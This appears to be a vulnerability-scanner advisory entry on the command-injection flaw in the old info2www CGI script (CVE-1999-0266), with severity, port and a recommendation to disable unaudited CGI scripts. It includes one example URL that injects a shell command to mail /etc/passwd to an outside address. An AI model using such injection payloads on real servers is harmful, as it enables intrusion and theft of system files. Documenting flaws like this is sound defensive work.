| VID |
21055 |
| Severity |
40 |
| Port |
80, ... |
| Protocol |
TCP |
| Class |
CGI |
| Detailed Description |
The 'info2www' CGI is installed.
The CGI script is a program used to convert GNU Info Nodes into HTML for viewing over the web. This CGI has a well known security flaw that lets anyone execute arbitrary commands with the privileges of the http daemon (root or nobody).
Several different versions of this program exist, some vulnerable and some not. Generally, if the script calls open() without parsing metacharacters from the HTTP request, it is vulnerable.
It is therefore possible to display any file on systems where info2www is world executable by sending something like:
http://target/cgi-bin/info2www?"(../../../bin/mail your@email < /etc/passwd|)" |
| Recommendation |
Paranoid sites should disable all CGI scripts until they have been thoroughly audited for security vulnerabilities. Versions prior to 1.2 of info2www should be considered vulnerable, as well as info2html, infogate, and other derivative works. |
| Related URL |
CVE-1999-0266 (CVE) |
| Related URL |
1995 (SecurityFocus) |
| Related URL |
1732 (ISS) |
|
